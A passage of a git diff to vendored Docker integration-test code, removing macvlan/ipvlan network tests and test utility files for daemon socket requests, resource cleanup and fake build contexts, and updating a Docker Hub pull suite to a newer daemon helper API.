dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", - "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "--internal", "di-internal-l3") - assertNwIsAvailable(c, "di-internal-l3") - nr := getNetworkResource(c, "di-internal-l3") - c.Assert(nr.Internal, checker.True) - - // start two containers on separate subnets - dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-internal-l3", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-internal-l3", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // access outside of the network should fail - result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkMacVlanExistingParent(c *check.C) { - // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - netName := "dm-parent-exists" - out, err := createMasterDummy(c, "dm-dummy0") - //out, err := createVlanInterface(c, "dm-parent", "dm-slave", "macvlan", "bridge") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0", netName) - assertNwIsAvailable(c, netName) - // delete the network while preserving the parent link - dockerCmd(c, "network", "rm", netName) - assertNwNotAvailable(c, netName) - // verify the network delete did not delete the predefined link - out, err = linkExists(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) 
- deleteInterface(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) -} - -func (s *DockerSuite) TestDockerNetworkMacVlanSubinterface(c *check.C) { - // macvlan bridge mode - empty parent interface containers can reach each other internally but not externally - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - netName := "dm-subinterface" - out, err := createMasterDummy(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = createVlanInterface(c, "dm-dummy0", "dm-dummy0.20", "20") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.20", netName) - assertNwIsAvailable(c, netName) - - // start containers on 802.1q tagged '-o parent' sub-interface - dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - // verify containers can communicate - _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) - - // remove the containers - dockerCmd(c, "rm", "-f", "first") - dockerCmd(c, "rm", "-f", "second") - // delete the network while preserving the parent link - dockerCmd(c, "network", "rm", netName) - assertNwNotAvailable(c, netName) - // verify the network delete did not delete the predefined sub-interface - out, err = linkExists(c, "dm-dummy0.20") - c.Assert(err, check.IsNil, check.Commentf(out)) - // delete the parent interface which also collects the slave - deleteInterface(c, "dm-dummy0") - c.Assert(err, check.IsNil, check.Commentf(out)) -} - -func createMasterDummy(c *check.C, master string) (string, error) { - // ip link add type dummy - args := []string{"link", "add", master, "type", "dummy"} - 
ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - // ip link set dummy_name up - args = []string{"link", "set", master, "up"} - ipLinkCmd = exec.Command("ip", args...) - out, _, err = runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - return out, err -} - -func createVlanInterface(c *check.C, master, slave, id string) (string, error) { - // ip link add link name . type vlan id - args := []string{"link", "add", "link", master, "name", slave, "type", "vlan", "id", id} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - // ip link set up - args = []string{"link", "set", slave, "up"} - ipLinkCmd = exec.Command("ip", args...) - out, _, err = runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - return out, err -} - -func linkExists(c *check.C, master string) (string, error) { - // verify the specified link exists, ip link show - args := []string{"link", "show", master} - ipLinkCmd := exec.Command("ip", args...) - out, _, err := runCommandWithOutput(ipLinkCmd) - if err != nil { - return out, err - } - return out, err -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go index df52cae1a4..125b8c10aa 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go @@ -5,7 +5,9 @@ import ( "runtime" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/go-check/check" ) @@ -25,7 +27,7 @@ func init() { // relative impact of each individual operation. 
As part of this suite, all // images are removed after each test. type DockerHubPullSuite struct { - d *Daemon + d *daemon.Daemon ds *DockerSuite } @@ -38,17 +40,15 @@ func newDockerHubPullSuite() *DockerHubPullSuite { // SetUpSuite starts the suite daemon. func (s *DockerHubPullSuite) SetUpSuite(c *check.C) { - testRequires(c, DaemonIsLinux) - s.d = NewDaemon(c) - err := s.d.Start() - c.Assert(err, checker.IsNil, check.Commentf("starting push/pull test daemon: %v", err)) + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + s.d.Start(c) } // TearDownSuite stops the suite daemon. func (s *DockerHubPullSuite) TearDownSuite(c *check.C) { if s.d != nil { - err := s.d.Stop() - c.Assert(err, checker.IsNil, check.Commentf("stopping push/pull test daemon: %v", err)) + s.d.Stop(c) } } @@ -84,7 +84,7 @@ func (s *DockerHubPullSuite) CmdWithError(name string, arg ...string) (string, e // MakeCmd returns an exec.Cmd command to run against the suite daemon. func (s *DockerHubPullSuite) MakeCmd(name string, arg ...string) *exec.Cmd { - args := []string{"--host", s.d.sock(), name} + args := []string{"--host", s.d.Sock(), name} args = append(args, arg...) return exec.Command(dockerBinary, args...) 
} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go deleted file mode 100644 index 3559bfdbb7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go +++ /dev/null @@ -1,165 +0,0 @@ -package main - -import ( - "encoding/json" - "fmt" - "io/ioutil" - "os" - "os/exec" - "path/filepath" - "strconv" - - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/pkg/reexec" -) - -var ( - // the docker client binary to use - dockerBinary = "docker" - // the docker daemon binary to use - dockerdBinary = "dockerd" - - // path to containerd's ctr binary - ctrBinary = "docker-containerd-ctr" - - // the private registry image to use for tests involving the registry - registryImageName = "registry" - - // the private registry to use for tests - privateRegistryURL = "127.0.0.1:5000" - - // TODO Windows CI. These are incorrect and need fixing into - // platform specific pieces. - runtimePath = "/var/run/docker" - - workingDirectory string - - // isLocalDaemon is true if the daemon under test is on the same - // host as the CLI. - isLocalDaemon bool - - // daemonPlatform is held globally so that tests can make intelligent - // decisions on how to configure themselves according to the platform - // of the daemon. This is initialized in docker_utils by sending - // a version call to the daemon and examining the response header. - daemonPlatform string - - // windowsDaemonKV is used on Windows to distinguish between different - // versions. This is necessary to enable certain tests based on whether - // the platform supports it. For example, Windows Server 2016 TP3 did - // not support volumes, but TP4 did. - windowsDaemonKV int - - // daemonDefaultImage is the name of the default image to use when running - // tests. This is platform dependent. 
- daemonDefaultImage string - - // For a local daemon on Linux, these values will be used for testing - // user namespace support as the standard graph path(s) will be - // appended with the root remapped uid.gid prefix - dockerBasePath string - volumesConfigPath string - containerStoragePath string - - // experimentalDaemon tell whether the main daemon has - // experimental features enabled or not - experimentalDaemon bool - - // daemonStorageDriver is held globally so that tests can know the storage - // driver of the daemon. This is initialized in docker_utils by sending - // a version call to the daemon and examining the response header. - daemonStorageDriver string - - // WindowsBaseImage is the name of the base image for Windows testing - // Environment variable WINDOWS_BASE_IMAGE can override this - WindowsBaseImage = "microsoft/windowsservercore" - - // isolation is the isolation mode of the daemon under test - isolation container.Isolation - - // daemonPid is the pid of the main test daemon - daemonPid int - - daemonKernelVersion string -) - -const ( - // DefaultImage is the name of the base image for the majority of tests that - // are run across suites - DefaultImage = "busybox" -) - -func init() { - reexec.Init() - if dockerBin := os.Getenv("DOCKER_BINARY"); dockerBin != "" { - dockerBinary = dockerBin - } - var err error - dockerBinary, err = exec.LookPath(dockerBinary) - if err != nil { - fmt.Printf("ERROR: couldn't resolve full path to the Docker binary (%v)\n", err) - os.Exit(1) - } - if registryImage := os.Getenv("REGISTRY_IMAGE"); registryImage != "" { - registryImageName = registryImage - } - if registry := os.Getenv("REGISTRY_URL"); registry != "" { - privateRegistryURL = registry - } - workingDirectory, _ = os.Getwd() - - // Deterministically working out the environment in which CI is running - // to evaluate whether the daemon is local or remote is not possible through - // a build tag. 
- // - // For example Windows to Linux CI under Jenkins tests the 64-bit - // Windows binary build with the daemon build tag, but calls a remote - // Linux daemon. - // - // We can't just say if Windows then assume the daemon is local as at - // some point, we will be testing the Windows CLI against a Windows daemon. - // - // Similarly, it will be perfectly valid to also run CLI tests from - // a Linux CLI (built with the daemon tag) against a Windows daemon. - if len(os.Getenv("DOCKER_REMOTE_DAEMON")) > 0 { - isLocalDaemon = false - } else { - isLocalDaemon = true - } - - // TODO Windows CI. This are incorrect and need fixing into - // platform specific pieces. - // This is only used for a tests with local daemon true (Linux-only today) - // default is "/var/lib/docker", but we'll try and ask the - // /info endpoint for the specific root dir - dockerBasePath = "/var/lib/docker" - type Info struct { - DockerRootDir string - ExperimentalBuild bool - KernelVersion string - } - var i Info - status, b, err := sockRequest("GET", "/info", nil) - if err == nil && status == 200 { - if err = json.Unmarshal(b, &i); err == nil { - dockerBasePath = i.DockerRootDir - experimentalDaemon = i.ExperimentalBuild - daemonKernelVersion = i.KernelVersion - } - } - volumesConfigPath = dockerBasePath + "/volumes" - containerStoragePath = dockerBasePath + "/containers" - - if len(os.Getenv("WINDOWS_BASE_IMAGE")) > 0 { - WindowsBaseImage = os.Getenv("WINDOWS_BASE_IMAGE") - fmt.Println("INFO: Windows Base image is ", WindowsBaseImage) - } - - dest := os.Getenv("DEST") - b, err = ioutil.ReadFile(filepath.Join(dest, "docker.pid")) - if err == nil { - if p, err := strconv.ParseInt(string(b), 10, 32); err == nil { - daemonPid = int(p) - } - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_utils.go deleted file mode 100644 index 749e4b3357..0000000000 --- 
a/vendor/github.com/docker/docker/integration-cli/docker_utils.go +++ /dev/null @@ -1,1607 +0,0 @@ -package main - -import ( - "bufio" - "bytes" - "crypto/tls" - "encoding/json" - "errors" - "fmt" - "io" - "io/ioutil" - "net" - "net/http" - "net/http/httptest" - "net/http/httputil" - "net/url" - "os" - "os/exec" - "path" - "path/filepath" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api/types" - volumetypes "github.com/docker/docker/api/types/volume" - "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/httputils" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/go-connections/tlsconfig" - units "github.com/docker/go-units" - "github.com/go-check/check" -) - -func init() { - cmd := exec.Command(dockerBinary, "images", "-f", "dangling=false", "--format", "{{.Repository}}:{{.Tag}}") - cmd.Env = appendBaseEnv(true) - out, err := cmd.CombinedOutput() - if err != nil { - panic(fmt.Errorf("err=%v\nout=%s\n", err, out)) - } - images := strings.Split(strings.TrimSpace(string(out)), "\n") - for _, img := range images { - protectedImages[img] = struct{}{} - } - - res, body, err := sockRequestRaw("GET", "/info", nil, "application/json") - if err != nil { - panic(fmt.Errorf("Init failed to get /info: %v", err)) - } - defer body.Close() - if res.StatusCode != http.StatusOK { - panic(fmt.Errorf("Init failed to get /info. Res=%v", res)) - } - - svrHeader, _ := httputils.ParseServerHeader(res.Header.Get("Server")) - daemonPlatform = svrHeader.OS - if daemonPlatform != "linux" && daemonPlatform != "windows" { - panic("Cannot run tests against platform: " + daemonPlatform) - } - - // Now we know the daemon platform, can set paths used by tests. 
- var info types.Info - err = json.NewDecoder(body).Decode(&info) - if err != nil { - panic(fmt.Errorf("Init failed to unmarshal docker info: %v", err)) - } - - daemonStorageDriver = info.Driver - dockerBasePath = info.DockerRootDir - volumesConfigPath = filepath.Join(dockerBasePath, "volumes") - containerStoragePath = filepath.Join(dockerBasePath, "containers") - // Make sure in context of daemon, not the local platform. Note we can't - // use filepath.FromSlash or ToSlash here as they are a no-op on Unix. - if daemonPlatform == "windows" { - volumesConfigPath = strings.Replace(volumesConfigPath, `/`, `\`, -1) - containerStoragePath = strings.Replace(containerStoragePath, `/`, `\`, -1) - // On Windows, extract out the version as we need to make selective - // decisions during integration testing as and when features are implemented. - // eg in "10.0 10550 (10550.1000.amd64fre.branch.date-time)" we want 10550 - windowsDaemonKV, _ = strconv.Atoi(strings.Split(info.KernelVersion, " ")[1]) - } else { - volumesConfigPath = strings.Replace(volumesConfigPath, `\`, `/`, -1) - containerStoragePath = strings.Replace(containerStoragePath, `\`, `/`, -1) - } - isolation = info.Isolation -} - -func convertBasesize(basesizeBytes int64) (int64, error) { - basesize := units.HumanSize(float64(basesizeBytes)) - basesize = strings.Trim(basesize, " ")[:len(basesize)-3] - basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64) - if err != nil { - return 0, err - } - return int64(basesizeFloat) * 1024 * 1024 * 1024, nil -} - -func daemonHost() string { - daemonURLStr := "unix://" + opts.DefaultUnixSocket - if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" { - daemonURLStr = daemonHostVar - } - return daemonURLStr -} - -func getTLSConfig() (*tls.Config, error) { - dockerCertPath := os.Getenv("DOCKER_CERT_PATH") - - if dockerCertPath == "" { - return nil, fmt.Errorf("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable") - } - - 
option := &tlsconfig.Options{ - CAFile: filepath.Join(dockerCertPath, "ca.pem"), - CertFile: filepath.Join(dockerCertPath, "cert.pem"), - KeyFile: filepath.Join(dockerCertPath, "key.pem"), - } - tlsConfig, err := tlsconfig.Client(*option) - if err != nil { - return nil, err - } - - return tlsConfig, nil -} - -func sockConn(timeout time.Duration, daemon string) (net.Conn, error) { - if daemon == "" { - daemon = daemonHost() - } - daemonURL, err := url.Parse(daemon) - if err != nil { - return nil, fmt.Errorf("could not parse url %q: %v", daemon, err) - } - - var c net.Conn - switch daemonURL.Scheme { - case "npipe": - return npipeDial(daemonURL.Path, timeout) - case "unix": - return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout) - case "tcp": - if os.Getenv("DOCKER_TLS_VERIFY") != "" { - // Setup the socket TLS configuration. - tlsConfig, err := getTLSConfig() - if err != nil { - return nil, err - } - dialer := &net.Dialer{Timeout: timeout} - return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig) - } - return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout) - default: - return c, fmt.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon) - } -} - -func sockRequest(method, endpoint string, data interface{}) (int, []byte, error) { - jsonData := bytes.NewBuffer(nil) - if err := json.NewEncoder(jsonData).Encode(data); err != nil { - return -1, nil, err - } - - res, body, err := sockRequestRaw(method, endpoint, jsonData, "application/json") - if err != nil { - return -1, nil, err - } - b, err := readBody(body) - return res.StatusCode, b, err -} - -func sockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { - return sockRequestRawToDaemon(method, endpoint, data, ct, "") -} - -func sockRequestRawToDaemon(method, endpoint string, data io.Reader, ct, daemon string) (*http.Response, io.ReadCloser, error) { - req, client, err := newRequestClient(method, endpoint, data, ct, 
daemon) - if err != nil { - return nil, nil, err - } - - resp, err := client.Do(req) - if err != nil { - client.Close() - return nil, nil, err - } - body := ioutils.NewReadCloserWrapper(resp.Body, func() error { - defer resp.Body.Close() - return client.Close() - }) - - return resp, body, nil -} - -func sockRequestHijack(method, endpoint string, data io.Reader, ct string) (net.Conn, *bufio.Reader, error) { - req, client, err := newRequestClient(method, endpoint, data, ct, "") - if err != nil { - return nil, nil, err - } - - client.Do(req) - conn, br := client.Hijack() - return conn, br, nil -} - -func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string) (*http.Request, *httputil.ClientConn, error) { - c, err := sockConn(time.Duration(10*time.Second), daemon) - if err != nil { - return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err) - } - - client := httputil.NewClientConn(c, nil) - - req, err := http.NewRequest(method, endpoint, data) - if err != nil { - client.Close() - return nil, nil, fmt.Errorf("could not create new request: %v", err) - } - - if ct != "" { - req.Header.Set("Content-Type", ct) - } - return req, client, nil -} - -func readBody(b io.ReadCloser) ([]byte, error) { - defer b.Close() - return ioutil.ReadAll(b) -} - -func deleteContainer(container ...string) error { - result := icmd.RunCommand(dockerBinary, append([]string{"rm", "-fv"}, container...)...) 
- return result.Compare(icmd.Success) -} - -func getAllContainers() (string, error) { - getContainersCmd := exec.Command(dockerBinary, "ps", "-q", "-a") - out, exitCode, err := runCommandWithOutput(getContainersCmd) - if exitCode != 0 && err == nil { - err = fmt.Errorf("failed to get a list of containers: %v\n", out) - } - - return out, err -} - -func deleteAllContainers() error { - containers, err := getAllContainers() - if err != nil { - fmt.Println(containers) - return err - } - if containers == "" { - return nil - } - - err = deleteContainer(strings.Split(strings.TrimSpace(containers), "\n")...) - if err != nil { - fmt.Println(err.Error()) - } - return err -} - -func deleteAllNetworks() error { - networks, err := getAllNetworks() - if err != nil { - return err - } - var errors []string - for _, n := range networks { - if n.Name == "bridge" || n.Name == "none" || n.Name == "host" { - continue - } - if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" { - // nat is a pre-defined network on Windows and cannot be removed - continue - } - status, b, err := sockRequest("DELETE", "/networks/"+n.Name, nil) - if err != nil { - errors = append(errors, err.Error()) - continue - } - if status != http.StatusNoContent { - errors = append(errors, fmt.Sprintf("error deleting network %s: %s", n.Name, string(b))) - } - } - if len(errors) > 0 { - return fmt.Errorf(strings.Join(errors, "\n")) - } - return nil -} - -func getAllNetworks() ([]types.NetworkResource, error) { - var networks []types.NetworkResource - _, b, err := sockRequest("GET", "/networks", nil) - if err != nil { - return nil, err - } - if err := json.Unmarshal(b, &networks); err != nil { - return nil, err - } - return networks, nil -} - -func deleteAllPlugins() error { - plugins, err := getAllPlugins() - if err != nil { - return err - } - var errors []string - for _, p := range plugins { - status, b, err := sockRequest("DELETE", "/plugins/"+p.Name+"?force=1", nil) - if err != nil { - errors = 
append(errors, err.Error()) - continue - } - if status != http.StatusNoContent { - errors = append(errors, fmt.Sprintf("error deleting plugin %s: %s", p.Name, string(b))) - } - } - if len(errors) > 0 { - return fmt.Errorf(strings.Join(errors, "\n")) - } - return nil -} - -func getAllPlugins() (types.PluginsListResponse, error) { - var plugins types.PluginsListResponse - _, b, err := sockRequest("GET", "/plugins", nil) - if err != nil { - return nil, err - } - if err := json.Unmarshal(b, &plugins); err != nil { - return nil, err - } - return plugins, nil -} - -func deleteAllVolumes() error { - volumes, err := getAllVolumes() - if err != nil { - return err - } - var errors []string - for _, v := range volumes { - status, b, err := sockRequest("DELETE", "/volumes/"+v.Name, nil) - if err != nil { - errors = append(errors, err.Error()) - continue - } - if status != http.StatusNoContent { - errors = append(errors, fmt.Sprintf("error deleting volume %s: %s", v.Name, string(b))) - } - } - if len(errors) > 0 { - return fmt.Errorf(strings.Join(errors, "\n")) - } - return nil -} - -func getAllVolumes() ([]*types.Volume, error) { - var volumes volumetypes.VolumesListOKBody - _, b, err := sockRequest("GET", "/volumes", nil) - if err != nil { - return nil, err - } - if err := json.Unmarshal(b, &volumes); err != nil { - return nil, err - } - return volumes.Volumes, nil -} - -var protectedImages = map[string]struct{}{} - -func deleteAllImages() error { - cmd := exec.Command(dockerBinary, "images") - cmd.Env = appendBaseEnv(true) - out, err := cmd.CombinedOutput() - if err != nil { - return err - } - lines := strings.Split(string(out), "\n")[1:] - var imgs []string - for _, l := range lines { - if l == "" { - continue - } - fields := strings.Fields(l) - imgTag := fields[0] + ":" + fields[1] - if _, ok := protectedImages[imgTag]; !ok { - if fields[0] == "" { - imgs = append(imgs, fields[2]) - continue - } - imgs = append(imgs, imgTag) - } - } - if len(imgs) == 0 { - return nil - } - 
args := append([]string{"rmi", "-f"}, imgs...) - if err := exec.Command(dockerBinary, args...).Run(); err != nil { - return err - } - return nil -} - -func getPausedContainers() (string, error) { - getPausedContainersCmd := exec.Command(dockerBinary, "ps", "-f", "status=paused", "-q", "-a") - out, exitCode, err := runCommandWithOutput(getPausedContainersCmd) - if exitCode != 0 && err == nil { - err = fmt.Errorf("failed to get a list of paused containers: %v\n", out) - } - - return out, err -} - -func getSliceOfPausedContainers() ([]string, error) { - out, err := getPausedContainers() - if err == nil { - if len(out) == 0 { - return nil, err - } - slice := strings.Split(strings.TrimSpace(out), "\n") - return slice, err - } - return []string{out}, err -} - -func unpauseContainer(container string) error { - return icmd.RunCommand(dockerBinary, "unpause", container).Error -} - -func unpauseAllContainers() error { - containers, err := getPausedContainers() - if err != nil { - fmt.Println(containers) - return err - } - - containers = strings.Replace(containers, "\n", " ", -1) - containers = strings.Trim(containers, " ") - containerList := strings.Split(containers, " ") - - for _, value := range containerList { - if err = unpauseContainer(value); err != nil { - return err - } - } - - return nil -} - -func deleteImages(images ...string) error { - args := []string{dockerBinary, "rmi", "-f"} - return icmd.RunCmd(icmd.Cmd{Command: append(args, images...)}).Error -} - -func imageExists(image string) error { - return icmd.RunCommand(dockerBinary, "inspect", image).Error -} - -func pullImageIfNotExist(image string) error { - if err := imageExists(image); err != nil { - pullCmd := exec.Command(dockerBinary, "pull", image) - _, exitCode, err := runCommandWithOutput(pullCmd) - - if err != nil || exitCode != 0 { - return fmt.Errorf("image %q wasn't found locally and it couldn't be pulled: %s", image, err) - } - } - return nil -} - -func dockerCmdWithError(args ...string) (string, 
int, error) { - if err := validateArgs(args...); err != nil { - return "", 0, err - } - result := icmd.RunCommand(dockerBinary, args...) - if result.Error != nil { - return result.Combined(), result.ExitCode, result.Compare(icmd.Success) - } - return result.Combined(), result.ExitCode, result.Error -} - -func dockerCmdWithStdoutStderr(c *check.C, args ...string) (string, string, int) { - if err := validateArgs(args...); err != nil { - c.Fatalf(err.Error()) - } - - result := icmd.RunCommand(dockerBinary, args...) - // TODO: why is c ever nil? - if c != nil { - c.Assert(result, icmd.Matches, icmd.Success) - } - return result.Stdout(), result.Stderr(), result.ExitCode -} - -func dockerCmd(c *check.C, args ...string) (string, int) { - if err := validateArgs(args...); err != nil { - c.Fatalf(err.Error()) - } - result := icmd.RunCommand(dockerBinary, args...) - c.Assert(result, icmd.Matches, icmd.Success) - return result.Combined(), result.ExitCode -} - -func dockerCmdWithResult(args ...string) *icmd.Result { - return icmd.RunCommand(dockerBinary, args...) -} - -func binaryWithArgs(args ...string) []string { - return append([]string{dockerBinary}, args...) 
-} - -// execute a docker command with a timeout -func dockerCmdWithTimeout(timeout time.Duration, args ...string) *icmd.Result { - if err := validateArgs(args...); err != nil { - return &icmd.Result{Error: err} - } - return icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Timeout: timeout}) -} - -// execute a docker command in a directory -func dockerCmdInDir(c *check.C, path string, args ...string) (string, int, error) { - if err := validateArgs(args...); err != nil { - c.Fatalf(err.Error()) - } - result := icmd.RunCmd(icmd.Cmd{Command: binaryWithArgs(args...), Dir: path}) - return result.Combined(), result.ExitCode, result.Error -} - -// execute a docker command in a directory with a timeout -func dockerCmdInDirWithTimeout(timeout time.Duration, path string, args ...string) *icmd.Result { - if err := validateArgs(args...); err != nil { - return &icmd.Result{Error: err} - } - return icmd.RunCmd(icmd.Cmd{ - Command: binaryWithArgs(args...), - Timeout: timeout, - Dir: path, - }) -} - -// validateArgs is a checker to ensure tests are not running commands which are -// not supported on platforms. Specifically on Windows this is 'busybox top'. -func validateArgs(args ...string) error { - if daemonPlatform != "windows" { - return nil - } - foundBusybox := -1 - for key, value := range args { - if strings.ToLower(value) == "busybox" { - foundBusybox = key - } - if (foundBusybox != -1) && (key == foundBusybox+1) && (strings.ToLower(value) == "top") { - return errors.New("cannot use 'busybox top' in tests on Windows. Use runSleepingContainer()") - } - } - return nil -} - -// find the State.ExitCode in container metadata -func findContainerExitCode(c *check.C, name string, vargs ...string) string { - args := append(vargs, "inspect", "--format='{{ .State.ExitCode }} {{ .State.Error }}'", name) - cmd := exec.Command(dockerBinary, args...) 
- out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } - return out -} - -func findContainerIP(c *check.C, id string, network string) string { - out, _ := dockerCmd(c, "inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.%s.IPAddress }}'", network), id) - return strings.Trim(out, " \r\n'") -} - -func getContainerCount() (int, error) { - const containers = "Containers:" - - cmd := exec.Command(dockerBinary, "info") - out, _, err := runCommandWithOutput(cmd) - if err != nil { - return 0, err - } - - lines := strings.Split(out, "\n") - for _, line := range lines { - if strings.Contains(line, containers) { - output := strings.TrimSpace(line) - output = strings.TrimLeft(output, containers) - output = strings.Trim(output, " ") - containerCount, err := strconv.Atoi(output) - if err != nil { - return 0, err - } - return containerCount, nil - } - } - return 0, fmt.Errorf("couldn't find the Container count in the output") -} - -// FakeContext creates directories that can be used as a build context -type FakeContext struct { - Dir string -} - -// Add a file at a path, creating directories where necessary -func (f *FakeContext) Add(file, content string) error { - return f.addFile(file, []byte(content)) -} - -func (f *FakeContext) addFile(file string, content []byte) error { - fp := filepath.Join(f.Dir, filepath.FromSlash(file)) - dirpath := filepath.Dir(fp) - if dirpath != "." 
{ - if err := os.MkdirAll(dirpath, 0755); err != nil { - return err - } - } - return ioutil.WriteFile(fp, content, 0644) - -} - -// Delete a file at a path -func (f *FakeContext) Delete(file string) error { - fp := filepath.Join(f.Dir, filepath.FromSlash(file)) - return os.RemoveAll(fp) -} - -// Close deletes the context -func (f *FakeContext) Close() error { - return os.RemoveAll(f.Dir) -} - -func fakeContextFromNewTempDir() (*FakeContext, error) { - tmp, err := ioutil.TempDir("", "fake-context") - if err != nil { - return nil, err - } - if err := os.Chmod(tmp, 0755); err != nil { - return nil, err - } - return fakeContextFromDir(tmp), nil -} - -func fakeContextFromDir(dir string) *FakeContext { - return &FakeContext{dir} -} - -func fakeContextWithFiles(files map[string]string) (*FakeContext, error) { - ctx, err := fakeContextFromNewTempDir() - if err != nil { - return nil, err - } - for file, content := range files { - if err := ctx.Add(file, content); err != nil { - ctx.Close() - return nil, err - } - } - return ctx, nil -} - -func fakeContextAddDockerfile(ctx *FakeContext, dockerfile string) error { - if err := ctx.Add("Dockerfile", dockerfile); err != nil { - ctx.Close() - return err - } - return nil -} - -func fakeContext(dockerfile string, files map[string]string) (*FakeContext, error) { - ctx, err := fakeContextWithFiles(files) - if err != nil { - return nil, err - } - if err := fakeContextAddDockerfile(ctx, dockerfile); err != nil { - return nil, err - } - return ctx, nil -} - -// FakeStorage is a static file server. It might be running locally or remotely -// on test host. 
-type FakeStorage interface { - Close() error - URL() string - CtxDir() string -} - -func fakeBinaryStorage(archives map[string]*bytes.Buffer) (FakeStorage, error) { - ctx, err := fakeContextFromNewTempDir() - if err != nil { - return nil, err - } - for name, content := range archives { - if err := ctx.addFile(name, content.Bytes()); err != nil { - return nil, err - } - } - return fakeStorageWithContext(ctx) -} - -// fakeStorage returns either a local or remote (at daemon machine) file server -func fakeStorage(files map[string]string) (FakeStorage, error) { - ctx, err := fakeContextWithFiles(files) - if err != nil { - return nil, err - } - return fakeStorageWithContext(ctx) -} - -// fakeStorageWithContext returns either a local or remote (at daemon machine) file server -func fakeStorageWithContext(ctx *FakeContext) (FakeStorage, error) { - if isLocalDaemon { - return newLocalFakeStorage(ctx) - } - return newRemoteFileServer(ctx) -} - -// localFileStorage is a file storage on the running machine -type localFileStorage struct { - *FakeContext - *httptest.Server -} - -func (s *localFileStorage) URL() string { - return s.Server.URL -} - -func (s *localFileStorage) CtxDir() string { - return s.FakeContext.Dir -} - -func (s *localFileStorage) Close() error { - defer s.Server.Close() - return s.FakeContext.Close() -} - -func newLocalFakeStorage(ctx *FakeContext) (*localFileStorage, error) { - handler := http.FileServer(http.Dir(ctx.Dir)) - server := httptest.NewServer(handler) - return &localFileStorage{ - FakeContext: ctx, - Server: server, - }, nil -} - -// remoteFileServer is a containerized static file server started on the remote -// testing machine to be used in URL-accepting docker build functionality. -type remoteFileServer struct { - host string // hostname/port web server is listening to on docker host e.g. 
